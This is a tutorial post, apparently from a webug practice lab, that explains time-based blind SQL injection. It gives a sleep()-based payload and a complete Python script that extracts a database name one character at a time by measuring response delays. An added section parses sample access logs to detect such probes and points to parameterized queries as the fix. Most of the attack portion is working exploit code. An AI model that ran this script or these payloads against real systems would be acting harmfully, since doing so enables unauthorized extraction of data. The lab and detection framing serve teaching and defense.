When testing for an injection vulnerability and the page returns no result, not even an error, consider a time delay.
For example, this statement: ?type=1 and if(length(database())=%d,sleep(5),1)
If the server executes this statement, the response will come back about 5 seconds slower than usual, so by comparing the response times we can tell whether the condition was true or false.
That gives us an approach for the script: to guess a field, first guess its length, then guess each character one by one.
This is once again a practice exercise from webug.
```python
import requests
import time

# Character set to try for each position of the database name
payloads = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,'
base_url = "http://192.168.148.129/pentest/test/time/"
delay = 5  # seconds of sleep() injected; a response slower than this means the condition was true


def long():
    # Guess the length of the database name: only the correct guess triggers sleep(5)
    print('start get length...')
    for l in range(1, 21):
        startTime1 = time.time()
        url1 = base_url + "?type=1 and if(length(database())=%d,sleep(5),1)" % (l)
        requests.get(url1)
        if time.time() - startTime1 > delay:
            print("the length is " + str(l))
            return l
    return 0  # no length in 1..20 triggered the delay


def inject(length):
    # Guess the name one position at a time, comparing against every candidate character
    print('start database sql injection...')
    database = ''
    for d in range(1, length + 1):
        for payload in payloads:
            startTime2 = time.time()
            url2 = base_url + "?type=1 and if(substr(database(),'%d',1)='%s',sleep(5),1)" % (d, payload)
            requests.get(url2)
            if time.time() - startTime2 > delay:
                database += payload
                print(database)
                break
    return database


if __name__ == '__main__':
    length = long()
    database = inject(length)
    print("the database is " + database)
```
The idea is to guess the field length first, then compare each position against every character in the payload set to get the final result.
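Seen from the defending side, the same timing signal the script relies on is what reveals the probing in server logs. The following is an added example and not part of the original post: it parses constructed access-log lines (the log format, client addresses and response times are assumed), flags requests whose parameters carry a delay primitive inside a condition, and counts per client how many of those ran slow, i.e. how many injected conditions evaluated true.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real traffic): client, method, request path, status, seconds taken.
SAMPLE_LOG = [
    "192.0.2.10 GET /pentest/test/time/?type=1 200 0.012",
    "192.0.2.77 GET /pentest/test/time/?type=1%20and%20if(length(database())=4,sleep(5),1) 200 0.015",
    "192.0.2.77 GET /pentest/test/time/?type=1%20and%20if(length(database())=5,sleep(5),1) 200 5.021",
    "192.0.2.77 GET /pentest/test/time/?type=1%20and%20if(substr(database(),1,1)=%27w%27,sleep(5),1) 200 5.018",
    "192.0.2.10 GET /pentest/test/time/?type=2 200 0.011",
]

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) (?P<secs>[\d.]+)$")
# A time-based probe needs a delay primitive wrapped in a condition the client controls.
DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.IGNORECASE)
CONDITION_RE = re.compile(r"\b(if|case|and|or)\b", re.IGNORECASE)

def classify(line, slow_threshold=4.0):
    """Describe one log line: which parameters look like timing probes and whether the request ran slow."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes the values, so %20 / %27 encoded payloads are inspected in clear form.
    params = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    suspicious = [name for name, values in params.items()
                  if any(DELAY_RE.search(v) and CONDITION_RE.search(v) for v in values)]
    return {
        "ip": m.group("ip"),
        "params": suspicious,
        "probe": bool(suspicious),
        # A probe that also exceeded the threshold means the injected condition evaluated true.
        "slow": float(m.group("secs")) >= slow_threshold,
    }

def summarize(lines, slow_threshold=4.0):
    """Per client: how many timing probes were sent and how many came back slow (condition true)."""
    stats = defaultdict(lambda: {"probes": 0, "true_conditions": 0})
    for line in lines:
        rec = classify(line, slow_threshold)
        if rec and rec["probe"]:
            stats[rec["ip"]]["probes"] += 1
            if rec["slow"]:
                stats[rec["ip"]]["true_conditions"] += 1
    return dict(stats)

if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} timing probes, {s['true_conditions']} with a true condition")
```

A client whose probe count climbs while only a fraction of them run slow is enumerating one character at a time, exactly as the script above does; the fix on the server side is a parameterized query for `type`, which the lab page lacks.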